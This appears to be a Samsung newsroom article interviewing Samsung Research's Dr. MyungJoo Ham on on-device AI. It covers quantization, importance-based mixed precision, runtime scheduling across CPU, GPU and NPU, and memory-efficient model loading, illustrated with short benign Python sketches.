In classic science fiction films, AI was often depicted as enormous servers or towering computer systems. Today, it is an everyday technology instantly available on the devices people carry. Samsung Electronics is expanding the use of on-device AI across products such as smartphones and home appliances, enabling AI to run locally, without external servers or the cloud, for faster and more secure experiences.
Unlike server-based systems, on-device environments operate under strict memory and processing constraints, so shrinking AI models and optimizing runtime performance are essential. To address this challenge, the Samsung Research AI Center is leading research in several key areas, including model compression, runtime software optimization, and the development of novel architectures.
Dr. MyungJoo Ham, Master at Samsung Research’s AI Center, spoke with Samsung Newsroom about the future of on-device AI and the optimization technologies that enable it.
Large language models (LLMs) are at the core of generative AI, interpreting user language and generating natural responses. The first step toward enabling on-device AI is compressing and refining these large models so they can run properly on devices like smartphones.
“Running a highly advanced model that performs billions of computations directly on a smartphone or laptop would quickly drain the battery, increase heat, and slow response times—noticeably degrading the user experience,” said Dr. Ham. “Model compression technology emerged to address these issues.”
LLMs carry out their computations using highly complex numerical representations. Model compression uses a process known as quantization to simplify this data into more efficient integer representations. “It’s similar to compressing a high-resolution photo so the file size shrinks but the visual quality remains nearly the same,” he said. “For example, switching from 32-bit floating-point calculations to 8-bit or even 4-bit integers greatly lowers computational load and memory consumption, accelerating response times.”
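The idea behind quantization can be seen in a minimal sketch: map floating-point weights onto a small integer range using a scale factor, then recover approximate values when needed. The weight values and the symmetric scaling scheme below are illustrative assumptions, not Samsung’s actual compression pipeline.

```python
import numpy as np

def quantize_int8(weights: np.ndarray):
    """Map float32 weights onto the int8 range [-127, 127] using one scale factor."""
    scale = float(np.abs(weights).max()) / 127.0
    q = np.clip(np.round(weights / scale), -127, 127).astype(np.int8)
    return q, scale

def dequantize(q: np.ndarray, scale: float) -> np.ndarray:
    """Recover approximate float values from the int8 representation."""
    return q.astype(np.float32) * scale

w = np.array([0.52, -1.30, 0.07, 0.91], dtype=np.float32)
q, scale = quantize_int8(w)
w_hat = dequantize(q, scale)
# int8 storage takes a quarter of the memory of float32,
# and each recovered value is off by at most half a quantization step
```

The rounding error is bounded by half the scale factor, which is why the quality loss stays small, much like the photo-compression analogy in the quote above.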
Reducing numerical precision during quantization can lower a model’s overall accuracy. To strike a balance between speed and model quality, Samsung Research is developing tools and algorithms that closely monitor and calibrate performance after compression.
“The goal of model compression isn’t just to make the model smaller—it’s to keep it fast and accurate,” Dr. Ham said. “Using optimization algorithms, we analyze the model’s loss function during compression and retrain it until its outputs stay close to the original, smoothing out areas with large errors. Because each model weight has a different level of importance, we preserve critical weights with higher precision while compressing less important ones more aggressively. This approach maximizes efficiency without compromising accuracy.”
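The per-weight precision idea Dr. Ham describes can be sketched as follows. Here, weight magnitude stands in for “importance” and the 8-bit/4-bit split is an illustrative assumption; real importance metrics are derived from the loss function, as the quote notes.

```python
import numpy as np

def mixed_precision_bits(weights: np.ndarray, keep_ratio: float = 0.2) -> np.ndarray:
    """Assign a per-weight bit width: the top keep_ratio of weights by
    magnitude (a simple stand-in for importance) keep 8 bits, the rest
    are compressed more aggressively to 4 bits."""
    k = max(1, int(len(weights) * keep_ratio))
    threshold = np.sort(np.abs(weights))[-k]
    return np.where(np.abs(weights) >= threshold, 8, 4)

w = np.array([0.9, -0.05, 0.02, -1.2, 0.1], dtype=np.float32)
bits = mixed_precision_bits(w)
# Only the largest-magnitude weight keeps full 8-bit precision,
# so the average bits per weight falls below a uniform 8-bit scheme
```

Preserving a small fraction of critical weights at higher precision costs little memory but protects the outputs that matter most, which is how efficiency is maximized without compromising accuracy.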
Samsung Research not only develops model compression technology at the prototype stage but also adapts and commercializes it for real-world products such as home appliances and smartphones.
“Because every device model has its own memory architecture and computing profile, a general approach can’t deliver cloud-level AI performance,” he said. “Through product-driven research, we’re designing our own compression algorithms to enhance AI experiences users can feel directly in their hands.”
Even with a well-compressed model, the user experience ultimately depends on how it runs on the device. Samsung Research is developing an AI runtime engine that maximizes the use of a device’s memory and processing power during execution.
“The AI runtime is essentially the model’s engine control unit,” Dr. Ham said. “When a model runs across multiple processors—such as the central processing unit (CPU), graphics processing unit (GPU), and neural processing unit (NPU)—the runtime automatically assigns each operation to the optimal chip and minimizes memory access to boost overall AI performance.”
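A toy sketch of the operator-placement idea is shown below. The preference table and fallback policy are illustrative assumptions for this article, not the actual policy of any Samsung runtime.

```python
# Hypothetical preferences: which processor suits each kind of operation.
PREFERRED = {
    "matmul": "NPU",    # large tensor math suits the NPU
    "conv2d": "NPU",
    "softmax": "GPU",   # parallel elementwise work suits the GPU
    "tokenize": "CPU",  # control-heavy logic suits the CPU
}

def place_ops(ops, available):
    """Assign each operation to its preferred processor if present on
    this device, falling back to the CPU otherwise."""
    plan = {}
    for op in ops:
        target = PREFERRED.get(op, "CPU")
        plan[op] = target if target in available else "CPU"
    return plan

# On a device without an NPU, matmul falls back to the CPU
plan = place_ops(["tokenize", "matmul", "softmax"], available={"CPU", "GPU"})
```

A real runtime also weighs data-transfer costs between processors, since moving tensors between chips can erase the gains of a faster compute unit, which is why minimizing memory access matters as much as picking the right chip.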
The AI runtime also allows larger, more complex models to run at the same speed on the same device. Beyond lowering response latency, this improves the overall quality of AI, producing more accurate results, smoother conversations, and more sophisticated image processing.
“The biggest bottlenecks in on-device AI are memory bandwidth and storage access speed,” he said. “We’re developing optimization techniques that intelligently balance memory and computation.” For example, loading only the data needed at a given moment, rather than keeping everything in memory, improves efficiency. “Samsung Research now has the capability to run a 30-billion-parameter generative model—typically more than 16 GB in size—on less than 3 GB of memory,” he added.
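The “load only the data needed at a given moment” approach can be illustrated with memory mapping: weights stay on storage and only the ranges actually accessed are paged into RAM. The file layout and sizes here are illustrative, not the technique Samsung uses to fit a 30-billion-parameter model in 3 GB.

```python
import os
import tempfile
import numpy as np

# Write ~4 MB of float32 "weights" to storage.
path = os.path.join(tempfile.mkdtemp(), "weights.npy")
np.save(path, np.arange(1_000_000, dtype=np.float32))

# Memory-map the file instead of reading it all into RAM.
weights = np.load(path, mmap_mode="r")

# Accessing one layer's slice pages in only that range of the file.
layer_slice = weights[2048:4096]
total = float(layer_slice.sum())
```

The trade-off is that storage access is far slower than RAM, which is why memory bandwidth and storage speed are the bottlenecks the quote identifies, and why deciding what to keep resident is an optimization problem in itself.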